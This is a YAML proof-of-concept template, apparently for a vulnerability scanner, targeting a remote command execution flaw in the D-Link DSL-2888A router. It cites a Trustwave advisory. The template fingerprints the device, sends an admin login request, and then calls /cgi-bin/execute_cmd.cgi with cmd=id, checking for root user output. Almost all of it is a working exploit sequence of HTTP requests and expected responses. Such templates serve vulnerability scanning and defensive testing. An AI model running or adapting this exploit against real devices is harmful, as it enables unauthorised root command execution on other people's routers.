product: D-Link
vName: poc-yaml-dlink-dsl-2888a-rce
type: ''
vID: []
level: 3
vDesc: ''
version: ''
note: ''
search: {}
protocol: http
link: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/d-link-multiple-security-vulnerabilities-leading-to-rce/
fix:
- 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
- exp:
    method: get
    follow: false
    path: /page/login/login.html
  verify:
    path: ''
    logic: and
    check:
    - status: 200
      body:
        value:
        - var ModelName="DSL-2888A";
        logic: and
      header:
        value:
        - Content-Type
        - text/html
        logic: and
- exp:
    method: post
    follow: false
    path: /
    header:
      Content-Type: application/x-www-form-urlencoded
    data: username=admin&password=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
  verify:
    path: ''
    logic: and
    check:
    - status: 302
      header:
        value:
        - location
        - /page/login/login_fail.html
        logic: and
- exp:
    method: get
    follow: false
    path: /cgi-bin/execute_cmd.cgi?timestamp=1589333279490&cmd=id
  verify:
    path: ''
    logic: and
    check:
    - status: 200
      body:
        value:
        - uid=0(admin) gid=0(admin)
        logic: and
      header:
        value:
        - Content-Type
        - text/html
        logic: and
